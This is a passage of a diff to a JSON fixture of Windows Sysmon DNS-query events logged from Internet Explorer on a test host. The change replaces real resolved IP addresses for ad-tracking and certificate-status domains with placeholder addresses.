xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692803100Z'/\u003e\u003cEventRecordID\u003e141\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.mathtag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-origin.mathtag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -4926,7 +4926,7 @@ "ProcessId": "2736", "QueryName": "status.rapidssl.com", "QueryStatus": "0", - "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;", + "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.184", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -4950,7 +4950,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692814000Z'/\u003e\u003cEventRecordID\u003e142\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.rapidssl.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692814000Z'/\u003e\u003cEventRecordID\u003e142\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.rapidssl.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { @@ -4967,7 +4967,7 @@ "time_created": "2019-07-18T03:34:04.692Z", "level": "information", "event_data": { - "QueryResults": "type: 5 cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:34.197.195.131;::ffff:34.192.39.82;::ffff:34.199.231.204;::ffff:34.199.113.81;::ffff:34.197.3.157;::ffff:34.205.112.156;::ffff:34.195.29.8;::ffff:34.201.247.123;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;", + "QueryResults": "type: 5 cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.184", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -4990,7 +4990,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692826300Z'/\u003e\u003cEventRecordID\u003e143\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.extend.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:34.197.195.131;::ffff:34.192.39.82;::ffff:34.199.231.204;::ffff:34.199.113.81;::ffff:34.197.3.157;::ffff:34.205.112.156;::ffff:34.195.29.8;::ffff:34.201.247.123;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692826300Z'/\u003e\u003cEventRecordID\u003e143\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.extend.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } @@ -5015,7 +5015,7 @@ "ProcessId": "2736", "QueryName": "ocsp.comodoca.com", "QueryStatus": "0", - "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { @@ -5031,7 +5031,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692837600Z'/\u003e\u003cEventRecordID\u003e144\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.185\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692837600Z'/\u003e\u003cEventRecordID\u003e144\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.185\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -5043,7 +5043,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692848900Z'/\u003e\u003cEventRecordID\u003e145\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.189\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync-tm.everesttech.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;::ffff:151.101.194.49;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692848900Z'/\u003e\u003cEventRecordID\u003e145\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.189\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync-tm.everesttech.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -5073,7 +5073,7 @@ "ProcessId": "2736", "QueryName": "sync-tm.everesttech.net", "QueryStatus": "0", - "QueryResults": "type: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;::ffff:151.101.194.49;", + "QueryResults": "type: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "event_id": "22" @@ -5104,7 +5104,7 @@ "event_data": { "QueryName": "idsync.rlcdn.com", "QueryStatus": "0", - "QueryResults": "::ffff:34.95.92.78;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.237", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -5115,7 +5115,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692865100Z'/\u003e\u003cEventRecordID\u003e146\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.237\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidsync.rlcdn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:34.95.92.78;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692865100Z'/\u003e\u003cEventRecordID\u003e146\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.237\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidsync.rlcdn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -5127,7 +5127,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692882700Z'/\u003e\u003cEventRecordID\u003e147\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track-eu.adformnet.akadns.net;::ffff:37.157.2.239;::ffff:37.157.6.253;::ffff:37.157.2.238;::ffff:37.157.4.25;::ffff:37.157.4.24;::ffff:37.157.6.247;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692882700Z'/\u003e\u003cEventRecordID\u003e147\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track-eu.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -5149,7 +5149,7 @@ "ProcessId": "2736", "QueryName": "cm.adform.net", "QueryStatus": "0", - "QueryResults": "type: 5 track-eu.adformnet.akadns.net;::ffff:37.157.2.239;::ffff:37.157.6.253;::ffff:37.157.2.238;::ffff:37.157.4.25;::ffff:37.157.4.24;::ffff:37.157.6.247;" + "QueryResults": "type: 5 track-eu.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;" }, "channel": "Microsoft-Windows-Sysmon/Operational", "event_id": "22", @@ -5166,7 +5166,7 